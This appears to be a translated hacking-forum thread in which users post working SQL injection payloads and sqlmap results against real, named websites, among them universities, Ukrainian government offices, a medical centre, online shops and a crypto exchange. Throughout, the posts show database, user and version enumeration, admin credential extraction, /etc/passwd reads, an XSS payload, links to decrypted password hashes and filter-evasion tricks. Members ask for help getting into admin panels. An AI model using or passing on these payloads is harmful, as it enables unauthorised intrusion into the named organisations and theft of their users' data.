http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3
Duplicate entry 'sitedepth1' for key 'group_key'
tables:
userman
site_settings
users
http://www.golf-in-japan.com/course.php?ID=372
+ bd mail hach username
https://yadi.sk/i/pxTpczCR3NmKpt
Code:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=372 AND 5008=5008
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: ID=372 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 32 columns
Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d4375 5072586e44506f504d575573424141775657754b625a736857 4a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL-- uzrc
---
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
available databases [2]:
gij_db
information_schema
http://www.odontoprimegroup.com/about.php?id=4
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=4' OR NOT 9339=9339#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=4' AND SLEEP(5)-- iguT
---
web application technology: Apache, PHP 5.4.22
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
information_schema
odonto_odo
http://remiremont.fr/associations/detail.php?id=68
Code:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=68 OR SLEEP(10)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a624 8755a6e67426e6c47675a546e5449546456755a7257426c534 b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL-- RzWd
---
http://gloomysunday.hu/shop.php?id=9
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-7104 OR 6087=6087#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=9 OR SLEEP(10)
---
New Jersey State Opera
Code:
http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user ()--
Code:
http://www.salut.ru/ViewTopic.php?Id=2325
http://www.salut.aero/info.php
view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),v ersion(),9,10,11,12,13,14,15,16%20--%20ccv
| 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost
joelblack
12.11.2017, 19:39
target: http://atmarine.fi
type:Error-Based
user:w8400337db@10.0.8.89
db:5.5.51-MariaDB
Code:
http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database( ),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
target: http://www.ubraintv.com
type:Union-Based
user:ubraintv@localhost
db:5.1.73 MySQL
Code:
http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7-- -
www.yorgasmic.com/article.php?id=148 (http://www.yorgasmic.com/article.php?id=148)
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=148 AND 3436=3436
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=148 AND SLEEP(5)
---
ALEXA 12,361
Code:
http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,l oad_file('/etc/passwd'),null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null--
http://www.aseanmarketplace.net/featured-listings.php?id=
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-2582 OR 5132=5132
Type: AND/OR time-based blind
Title: MySQL time-based blind - Parameter replace (MAKE_SET)
Payload: id=MAKE_SET(8180=8180,SLEEP(5))
---
available databases [2]:
amp
information_schema
Table: admin
[1 entry]
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | read | the first post |
+----+----------+----------------------------------+
How do I get into the admin panel? /administrator won't let me in...
What should I do - maybe someone can advise....
Code:
http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database (),9,10,11,12,13,14--
Code:
http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--
Code:
http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(), 7--
BabaDook
13.02.2018, 23:48
PHP:
http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+ select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0+--+-
joelblack
28.02.2018, 00:38
target: http://illan-gifts.ru
type: Error-Based
user: wapp@localhost
version:5.5.52-MariaDB
Code:
http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'
qwaszx000
13.03.2018, 18:26
Code:
http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11
Number 2 is displayed.
Code:
https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8 ,9,10,user(),12,13,14--
Code:
http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+--+
Code:
https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails
Parameter: appname (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: appname=Emails' AND 8893=8893-- ZiPX
---
[12:48:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
available databases [5]:
information_schema
mysql
pbcomput_swym
performance_schema
sys
DezMond™
21.08.2018, 10:42
Code:
https://www.mato-gmbh.com/produkte/mview'and(extractvalue(null,concat(1,(select+user( )))))='1/251/?PHPSESSID=99f3768df8485b713f55dc60de16c1aa
DezMond™
07.09.2018, 14:03
DA49
Code:
https://www.bfz.de/seminarfinder?the_id=13&zieg_id=-8+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12, 13,14,15,16,17+--+&foern_id=1&vanort=&umkreis=10&stichwort=&sort=entf&submitted=1
Microsoft SQL Server 2008 R2 (SP3)
DezMond™
15.09.2018, 14:20
https://www.flemings-hotels.com/index.php?&lang=ger&ajax=subcat&id=1'+union+select+user()+--+
spherics
22.09.2018, 20:03
http://www.elektronika.ru/index.php...s(0x3a3a,version(),user(),database()), 3,4,6-- (http://www.elektronika.ru/index.php?option=com_brand&brand=25000000/**/Union+select/**/1,concat_ws(0x3a3a,version(),user(),database()),3, 4,6--)
5.5.52-MariaDB::edbuser@localhost::elektronika
Crypto exchange, blind injection.
Code:
sqlmap -u "https://www.ccnex.com/index.php?before_group=3&c=member_controller&m=upgrade&now_group=5&s=help&username=if" -p "username" --dbms=mysql --level=3 --risk=3 --random-agent --dbs
Pirnazar
19.10.2018, 19:20
Code:
http://top.magreklama.ru/
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=260 AND 9312=9312
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=260 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-3254 UNION ALL SELECT CONCAT(0x71766a6a71,0x686e626c4b547a41514a78415246 66765564447557656e73737257757144446b48456943704754 58,0x717a767871)-- Tzua
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
Decrypted hashes from the table rekl_kv_naozero.users in hash:pass form
http://zalil.su/6334652
https://ratingdatings.ru/1'or(ExtractValue(1,concat(0x3a,(select(version()) ))))='1
Code:
TECOM is a dynamically developing telecommunications company that has accumulated solid experience in the design, supply and installation of communications equipment, and also provides communications and Internet access services. We offer our clients effective and prompt solutions to problems arising in the organization of telephone communications and the operation of telecommunications equipment.
Code:
http://www.tecom.ru/internet.php?id=-3+union+select+1,version(),database()--
I wrote to the admins, but they turned out not to give a damn about any of it, so I decided to post it here...
P.S. There is also a CommuniGate Pro administrative interface there
Code:
http://81.3.154.236:8010/Master/MainAdmin/
Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,4,5,6,7,8,9--
Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,7,8,9--
Code:
https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables+limit%201,1--
changed it...
Code:
http://www.exxiasports.com/eventos.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10--
Code:
http://www.exxiasports.com/eventos.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10--
Code:
http://www.nichegardens.com/catalog/item.php?id=-1235+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35--
Code:
http://www.nichegardens.com/catalog/item.php?id=-1235+union+select+1,2,3,4,concat_ws(0x3a,version() ,database(),user()),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35--
John Lawrence Detwiler Memorial Library - Adventist University of the Philippines
Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,2,3,4,5--
Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--
Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+37,8--
Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=%27user%27+limit +0,3--
Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,username,3,4,5+from+user+limit+0, 1--
Code:
http://jldmlibrary.aup.edu.ph/subcontent.php?id=-5+union+select+1,password,3,4,5+from+user+limit+0, 1--
International Leasing Securities Ltd.
DB version:
Code:
http://www.ilslbd.com/content.php?Id=1%27or(ExtractValue(1,concat(0x3a,( select(version())))))=%271
find the table we need:
Code:
http://www.ilslbd.com/content.php?Id=-1%27+UNION+select+1,2,convert(table_name%20using%2 0latin1)+from+information_schema.tables+limit+45,1 +--+
play with the limit and get the column we need:
Code:
http://www.ilslbd.com/content.php?Id=-1%27+UNION+select+1,2,convert(column_name%20using% 20latin1)+from+information_schema.columns+where+ta ble_name=%27admin%27+limit+3,1+--+
get the admin login
Code:
http://www.ilslbd.com/content.php?Id=-1%27+UNION+select+1,2,convert(UserName%20using%20l atin1)+from+admin+limit+0,1+--+
and from here you're on your own...
DezMond™
24.12.2018, 19:59
Code:
http://www.ub.edu/aqr/fitxa-persones_en.php?id=-8+/*!12345uNIoN*/+/*!12345sELecT*/+1,2,3,user()+--+
DezMond™
03.01.2019, 16:29
https://www.uni-hohenheim.de/politm...l.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+ (https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+)
DezMond™ said:
https://www.uni-hohenheim.de/politm...l.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+ (https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,2,3,4,5,6,7,8+--+)
Took it further ))
Code:
https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8+--+
Code:
https://www.uni-hohenheim.de/politmonitor/analysen_detail.php?id=-25+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables+limit+17,1+--+
==================================
and something from me:
Iraq Parliament Monitor
Code:
http://www.miqpm.com/new/English/News.php?ID=-1+union+select+1,2,3,4,5--
Code:
http://www.miqpm.com/new/English/News.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--
Code:
http://www.miqpm.com/new/English/News.php?ID=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+0,77--
Dr. Khuroo’s Medical Centre
Code:
http://www.drkhuroo.in/news.php?id=-9%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,2,3,4,5,6,7,8+--+
Code:
http://www.drkhuroo.in/news.php?id=-9%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,concat_ws(0x3a,version(),database(),user()),3,4 ,5,6,7,8+--+
Code:
http://www.drkhuroo.in/news.php?id=-9%27+/*!12345uNIoN*/+/*!12345sELecT*/+1,table_name,3,4,5,6,7,8+from+information_schema. tables+limit+90,1+--+
Aayojan School of Architecture
Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10--
Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user()),9,10--
Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10+from+ information_schema.tables+limit%2059,1--
Code:
http://www.aayojan.edu.in/jaipur/events_detail.php?id=-1+union+select+1,2,3,4,5,6,7,column_name,9,10+from +information_schema.columns+where+table_name=%27ad min_login%27+limit%203,5--
The Regional Center for Social Science and Sustainable Development
Chiang Mai University
Code:
http://rcsd.soc.cmu.ac.th/home/index.php?button=Submit&ptype=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+&sfile=publication
Code:
http://rcsd.soc.cmu.ac.th/home/index.php?button=Submit&ptype=-3+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12+--+&sfile=publication
Code:
http://rcsd.soc.cmu.ac.th/home/info.php
P.S. I was too lazy to go further...
OJSC "Brest - VTI"
Code:
http://brestvti.by/product.php?id=-115+union+select+1,2,3,4,5,6--
Code:
http://brestvti.by/product.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6--
BenderMR
25.02.2019, 05:48
Actuaries
Code:
http://www.actuaries.org.hk/education.php?id=13%27%20union%20select%201,%27tab le%27,3,concat_ws(0x7C,user(),database(),%20versio n()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--+#
actuarie_db@localhost|actuarie_db|5.7.25
lltours
Code:
http://www.lltours.com.ve/hoteles/ficha-promo.php?id=69%20and%20false%20union%20select%201 ,2,3,concat_ws(0x7C,user(),database(),%20version() ),5,6,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34
lltourssysweb@localhost|lltours|5.5.62-0+deb8u1
Aryapg College
Code:
https://www.aryapgcollege.com/event.php?id=67%20and%200=1%20union%20select%201,2 ,%27tables%27,concat_ws(0x7C,user(),database(),%20 version()),5
aryapgco_a9p8g7c@localhost|aryapgco_collegepgarya9 649|10.0.38-MariaDB
BenderMR
25.02.2019, 05:59
WignWeave is behind Mod_Security
Code:
http://www.wignweave.com/event.php?id=-34+/*!50000union*/+/*!50000select*/+1,2,%203,4,5,concat_ws(0x7C,user(),database(),ver sion())--+
wignweav_shop@localhost|wignweav_shop|5.6.41-84.1
BenderMR
27.02.2019, 09:28
Sprint15
Code:
https://www.sprint15.com/events/EMS/event.php?id=173%20and%20false%20union%20select%20 1,2,3,4,5,6,7,8,9,10,concat_ws(0x7C,user(),databas e(),%20version()),12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40--+
uspr_191808_0002@localhost|sprint15com_191808_db2| 5.5.62
Gl Bajaj Institute
Code:
http://www.glbimr.org/event.php?id=-55%27%20union%20select%201,concat_ws(0x7C,user(),d atabase(),version()),3--+
glbimrfeb2019@localhost|glbimr_org_feb21|5.6.43
BenderMR
28.02.2019, 09:17
Great Canadian Healthcare Mall
There is no output on the page. It outputs into the src attribute of the img tag.
Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,concat_ws('|',current_us er,@@version),6,7,8,9,10%20--%20&ptab=description&title=Nitroglycerin
canazqik_user@localhost | 10.1.37-MariaDB-cll-lve
It filters out many functions, including database()
Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000sCheMA_naMe*/,6,7,8,9,10 from%20/*!50000infoRmaTioN_scHeMa.sCheMatA*/--%20&ptab=description&title=Nitroglycerin
canazqik_db
Take all the tables
Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000group_concat(table_name)*/,6,7,8,9,10 from%20/*!50000infoRmaTioN_scHeMa.tables*/ where table_schema='canazqik_db'--%20&ptab=description&title=Nitroglycerin
Count what is actually in there
Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000count(*)*/,6,7,8,9,10 from%20orders where length(paypaldata)>3--%20&ptab=description&title=Nitroglycerin
Astinsriwedarisolo
Code:
http://www.astinsriwedarisolo.com/product.php?id=-111111111111111111111111111%27%20union%20select%20 %271%27,concat_ws(%27|%27,%20database(),user(),ver sion()),%273%27,%274%27,%275%27,%276%27--+
astin|astin@localhost|5.5.44
Code:
http://www.astinsriwedarisolo.com/product.php?id=-1%27%20union%20select%20%271%27,group_concat(colum n_name,0x0a)%20,%273%27,%274%27,%275%27,%276%27%20 from%20information_schema.columns%20where%20table_ schema%20like%20database()%20and%20table_name=%27a rf_member%27--+
For those who don't mind sitting with a translator
Miyabi
Code:
http://www.miyabi.com.au/item.php?id=281%20and%201%3E2%20union%20select%201 ,2,3,4,5,6,7,concat_ws(%27|%27,user(),database(),v ersion()),9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23--+
driving_miyabi@bsd34.qnetau.com|driving_m iyabi|5.7.21-log
Code:
http://www.miyabi.com.au/item.php?id=281%20and%201%3E2%20union%20select%201 ,2,3,4,5,6,7,user(),group_concat(column_name,0x0a) ,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from% 20information_schema.columns%20where%20table_schem a=database()%20and%20table_name=%27MEMBER%27--+
BenderMR
09.03.2019, 03:52
WebLoadmpStore
Code:
http://www.webloadmpstore.com/product.php?id=-3%20/*!12345uNioN*/+/*!12345SeLeCt*/+1,2,concat_ws(0x7c,database(),user(),version()),4 ,5,6,7
webloadm_new|webloadm_new@localhost|5.6.39-83.1
Corbett Foundation
Code:
http://www.corbettfoundation.org/product.php?id=-53%20union%20select%201,2,3,4,5,6,concat_ws(%27|%2 7,database(),user(),version()),8,9,10,11&cat=&subcat=
corbettf_org|corbettf_org@localhost|5.6.43
Go Healthy
Code:
https://gohealthy.co.za/product.php?id=-612%27%20union%20select%201,concat_ws(%27|%27,user (),database(),version()),group_concat(table_name,0 x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23%20from%20information_schema.tables%20wher e%20table_schema=database()--+
goheadbwpz_1@dedi909.jnb1.host-h.net|goheadbwpz_db1|10.1.38-MariaDB-1~jessie
BenderMR
04.04.2019, 07:36
So, I'm leaking this SQLi found on smotra.ru, since my report to them was ignored.
Code:
sqlmap -u http://smotra.ru/market/cat/11*/ -D sm_test --dbms mysql --sql-shell --random-agent
DB: sm_test
USER: sm_test@localhost
VERSION: 5.1.73
And here is Erik himself:
Code:
sqlmap -u 'http://smotra.ru/market/cat/11*/' -D sm_test -T users -C email, password --where="slug='erik_davidych'" --dump --dbms mysql --random-agent
BenderMR
07.04.2019, 06:44
Fiscal Service of Ukraine
Code:
http://sfs.gov.ua/registration.php?search=area&hregion_id=2 and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x7c,database(),user(),version()) )))
XPATH syntax error: ' site|front_tmp@10.85.6.2|5.1.73'
And a quick question right away. As soon as the word FROM appears, I immediately get a syntax error. I can't get any further.
The question itself: is this really some kind of syntax error, or is there that kind of filtering there?
And how do you get around this nonsense at all, because it's not the first time it stalls exactly on FROM and nothing gets through. Hackers, advise me
BenderMR
07.04.2019, 11:34
National Academy of Agrarian Sciences of Ukraine
Code:
http://imesg.gov.ua/info/index.php?id=41
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=41' AND 2988=2988 AND 'ouFu'='ouFu
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=41' AND SLEEP(5) AND 'cnAl'='cnAl
VERSION: 5.6.34
USER:imesg_db_utf@localhost
DB: imesg_db_utf
Department of Labor and Social Protection of the Population of the Khmelnytskyi City Council
Code:
https://soczahist.khm.gov.ua/index.php?ID=-423%20union%20select%20concat_ws(0x7c,database(),v ersion(),user()),group_concat(table_name),3,4%20fr om%20information_schema.tables%20where%20table_sch ema=database()
soczahis_soczah|5.5.53|soczahis_soczah@localhost
Something to do with drug circulation and licensing for it
Code:
http://usuan.dls.gov.ua/filial.php?id=-4347%20union%20select%201,concat_ws(0x7c,%20databa se(),user(),%20version()),3,4,5,6,7,8,9,11,12,13,1 4
usuan|5.6.38|usuan@localhost
Code:
http://www.blubud.it/eng/news.php?id=-88+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--
BenderMR
13.04.2019, 10:56
stanok
Code:
http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ ws(0x7c,database(),version(),user()),11,12,13,14,1 5,16,17,18,19,20
ininterne1_stan|5.5.42-log|ininterne1_stan@192.168.1.41
some Spanish shop
Code:
http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,datab ase(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
tecni_sitio|5.6.43|tecni@localhost
BenderMR
13.04.2019, 20:16
Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,conc at_ws(0x7c,database(),version(),user()),12,13,14,1 5,16,17,18,19,20,21--+-&type=2
db_eircicai|5.5.51|koresoft@localhost
and an XSS right here too
Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cs cript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
BabaDook
13.04.2019, 20:29
BenderMR said:
Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,conc at_ws(0x7c,database(),version(),user()),12,13,14,1 5,16,17,18,19,20,21--+-&type=2
db_eircicai|5.5.51|koresoft@localhost
and an XSS right here too
Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cs cript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
This is called SiXSS
Code:
http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,concat_ws(0x3a,version(),database(),user() ),19,20--
DezMond™
03.05.2019, 18:33
Code:
http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
WallHack
15.05.2019, 13:54
Code:
http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20 -- -
RedHazard
17.05.2019, 02:29
Code:
https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
BenderMR
23.05.2019, 14:22
MegaKeys.RU
Code:
https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2 ,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(), version()),9,10--+-#&rtype=good&page=9
Code:
http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())+--+
BenderMR
28.05.2019, 21:47
BChainHacks
Code:
https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c ,database(),version(),user()),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34
bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
Baskin-Robbins
21.08.2019, 23:47
Code:
www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_fi le('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_w s(0x3a3a,host,user,file_priv,insert_priv,update_pr iv) SEPARATOR " ") FROM mysql.user --%20
5.5.52-MariaDB
Code:
https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group _concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
5.5.61-0ubuntu0.14.04.1-log
Code:
https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
5.5.60-MariaDB
Pop-Xlop
26.08.2019, 01:23
curl http://bitcoin-office.com/globalscape-register-miner-contract.php --data "worker=azaza'and(extractvalue(1,concat(0x3b,(selec t/**/version()))))and'"
Error: XPATH syntax error: ';10.1.41-MariaDB-cll-lve'
Pop-Xlop
26.08.2019, 02:51
https://sarov.info Kolyuchiy Sarov, Yandex IKS (formerly TIC) 3600
Several SQL injections.
First:
Code:
https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3+--+1
admin_bbnews@192.168.1.17:5.6.38:admin_bbnews
Second:
Code:
curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%2 3%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"
XPATH syntax error: ';5.6.38'
The owner of the resource, Kirill Astashov aka BadBlock, is known in the Nizhny Novgorod region as a fighter against extremism in comments, with subsequent reports to Center "E".
Baskin-Robbins
04.09.2019, 22:52
Code:
https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat (column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20
5.5.55-0+deb8u1
Code:
www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name )),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20
5.6.41-84.1
Code:
